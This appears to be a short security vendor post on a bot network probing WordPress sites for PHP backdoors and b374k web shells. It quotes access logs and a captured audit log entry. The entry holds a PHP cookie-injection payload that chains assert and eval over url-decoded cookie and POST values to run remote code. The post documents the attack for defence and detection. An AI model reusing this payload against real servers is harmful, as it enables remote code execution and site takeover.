PHP Cookie Injection

by

We found lot off new activies again somekind bot network:

198.57.247.139 - - [09/Aug/2016:03:34:29 +0300] "POST /wp-blog-header.php HTTP/1.1" 404 314 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:30 +0300] "POST /wp-content/error-log.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:30 +0300] "POST /tmp.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:30 +0300] "POST /error-log.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:31 +0300] "POST /stats.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:31 +0300] "POST /xmlrppc.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:32 +0300] "POST /modules/modules/modules.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:32 +0300] "POST /wp-includes/ms-files-qu.php HTTP/1.1" 403 735 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:32 +0300] "POST /configuration.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:33 +0300] "POST /adodb.class.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:33 +0300] "POST /media/b374k-2.8.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:34 +0300] "POST /wp-conff.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:34 +0300] "POST /images/b374k-2.8.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:34 +0300] "POST /wp-includes/error-log.php HTTP/1.1" 403 733 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:35 +0300] "POST /wp-content/themes/argus/adodb.class.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:36 +0300] "POST /xmlrpc-activate.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:46 +0300] "POST /upgrade.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:47 +0300] "POST /wp-content/themes/argus/error-log.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:48 +0300] "POST /wp-load.php HTTP/1.1" 404 196 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:48 +0300] "POST /wpfootes.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:49 +0300] "POST /wpfoot.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:50 +0300] "POST /wp-checking.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:51 +0300] "POST /logsys.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:51 +0300] "POST /home.bak.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:52 +0300] "POST /b374k-2.8.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:52 +0300] "POST /cfiles.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:52 +0300] "POST /prelog.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"
198.57.247.139 - - [09/Aug/2016:03:34:53 +0300] "POST /wp-content/b374k-2.8.php HTTP/1.1" 404 12813 "-" "Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0"

If we look this line number 19: wp-load.php from auditlog and found there cookie ID & CODE payload (php eval):

--3820f24c-A--
[09/Aug/2016:23:15:03 +0300] V6o5x1Qikx4AAAw5jbMAAAAH 43.255.152.6 47003 84.34.147.30 80
--3820f24c-B--
POST /wp-load.php HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: dt-works.net
User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:16.0) Gecko/20130722 Firefox/16.0
Content-Length: 83
Content-Type: application/x-www-form-urlencoded
Cookie: user=assert; id=eval%28url_decode%28%24%5FCOOKIE%5Bcode%5D%29%29; code=eval(url_decode(url_decode($_POST[chr(99).chr(111).chr(100).chr(101).chr(122)])))%3B;

--3820f24c-C--
codez=echo%252520%252528123454320%25252B1%252529%25253Bexit%252528%252529%25253B%3B
--3820f24c-F--

Our commerical ModSecurity rules detect these and block them!